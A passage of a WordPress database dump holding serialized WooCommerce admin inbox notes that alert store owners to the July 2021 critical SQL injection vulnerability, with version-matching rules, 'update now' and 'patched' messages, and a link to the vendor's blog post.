type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.0.2\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.1.2\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.2.3\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.3.4\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.4.2\";}i:12;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.5.3\";}i:13;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.6.3\";}i:14;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.7.2\";}i:15;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.8.1\";}i:16;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.9.3\";}i:17;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.0.1\";}i:18;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.1.1\";}i:19;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.2.3\";}i:20;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.3.1\";}i:21;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.4.2\";}i:22;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"<\";s:7:\"version\";s:5:\"5.5.1\";}}}s:48:\"woocommerce-blocks-sqli-july-2021-need-to-update\";O:8:\"stdClass\":8:{s:4:\"slug\";s:48:\"woocommerce-blocks-sqli-july-2021-need-to-update\";s:4:\"type\";s:6:\"update\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:63:\"Action required: Critical vulnerabilities in WooCommerce Blocks\";s:7:\"content\";s:570:\"In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br/><br/>Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br/><br/>For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:146:\"https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=vulnerability_comms\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:7:\"dismiss\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:7:\"Dismiss\";}}s:3:\"url\";b:0;s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:0;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:31:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:6:\"2.5.16\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"2.6.2\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"2.7.2\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"2.8.1\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"2.9.1\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.0.1\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.1.1\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.2.1\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.3.1\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.4.1\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.5.1\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.6.1\";}i:12;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.7.2\";}i:13;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.8.1\";}i:14;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.9.1\";}i:15;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.0.1\";}i:16;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.1.1\";}i:17;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.2.1\";}i:18;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.3.1\";}i:19;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.4.3\";}i:20;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.5.3\";}i:21;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.6.1\";}i:22;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.7.1\";}i:23;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.8.1\";}i:24;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"4.9.2\";}i:25;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.0.1\";}i:26;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.1.1\";}i:27;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.2.1\";}i:28;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.3.2\";}i:29;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"5.4.1\";}i:30;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"<\";s:7:\"version\";s:5:\"5.5.1\";}}}s:45:\"woocommerce-core-sqli-july-2021-store-patched\";O:8:\"stdClass\":8:{s:4:\"slug\";s:45:\"woocommerce-core-sqli-july-2021-store-patched\";s:4:\"type\";s:6:\"update\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:55:\"Solved: Critical vulnerabilities patched in WooCommerce\";s:7:\"content\";s:433:\"In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br/><br/><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:146:\"https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=vulnerability_comms\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:7:\"dismiss\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:7:\"Dismiss\";}}s:3:\"url\";b:0;s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:0;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:46:\"woocommerce-core-sqli-july-2021-need-to-update\";s:6:\"status\";s:7:\"pending\";s:9:\"operation\";s:1:\"=\";}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:48:\"woocommerce-blocks-sqli-july-2021-need-to-update\";s:6:\"status\";s:7:\"pending\";s:9:\"operation\";s:1:\"=\";}}}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:23:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.3.6\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.4.8\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.5.9\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.6.6\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.7.2\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.8.2\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.9.4\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.0.2\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.1.2\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.2.3\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.3.4\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.4.2\";}i:12;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.5.3\";}i:13;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.6.3\";}i:14;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.7.2\";}i:15;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.8.1\";}i:16;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.9.3\";}i:17;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.0.1\";}i:18;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.1.1\";}i:19;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.2.3\";}i:20;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.3.1\";}i:21;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.4.2\";}i:22;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:5:\"5.5.1\";}}}}}s:47:\"woocommerce-blocks-sqli-july-2021-store-patched\";O:8:\"stdClass\":8:{s:4:\"slug\";s:47:\"woocommerce-blocks-sqli-july-2021-store-patched\";s:4:\"type\";s:6:\"update\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:62:\"Solved: Critical vulnerabilities patched in WooCommerce Blocks\";s:7:\"content\";s:433:\"In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br/><br/><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:146:\"https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=vulnerability_comms\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:7:\"dismiss\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:7:\"Dismiss\";}}s:3:\"url\";b:0;s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:0;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:46:\"woocommerce-core-sqli-july-2021-need-to-update\";s:6:\"status\";s:7:\"pending\";s:9:\"operation\";s:1:\"=\";}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:48:\"woocommerce-blocks-sqli-july-2021-need-to-update\";s:6:\"status\";s:7:\"pending\";s:9:\"operation\";s:1:\"=\";}}}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:31:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:6:\"2.5.16\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"2.6.2\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"2.7.2\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"2.8.1\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"2.9.1\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.0.1\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.1.1\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.2.1\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.3.1\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.4.1\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.5.1\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.6.1\";}i:12;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.7.2\";}i:13;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.8.1\";}i:14;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"3.9.1\";}i:15;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.0.1\";}i:16;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.1.1\";}i:17;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.2.1\";}i:18;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.3.1\";}i:19;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.4.3\";}i:20;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.5.3\";}i:21;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.6.1\";}i:22;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.7.1\";}i:23;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.8.1\";}i:24;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"4.9.2\";}i:25;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.0.1\";}i:26;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.1.1\";}i:27;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.2.1\";}i:28;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.3.2\";}i:29;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.4.1\";}i:30;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:28:\"woo-gutenberg-products-block\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:5:\"5.5.1\";}}}}}}','yes'),
(52908,'_transient_woocommerce_reports-transient-version','1649858603','yes'),
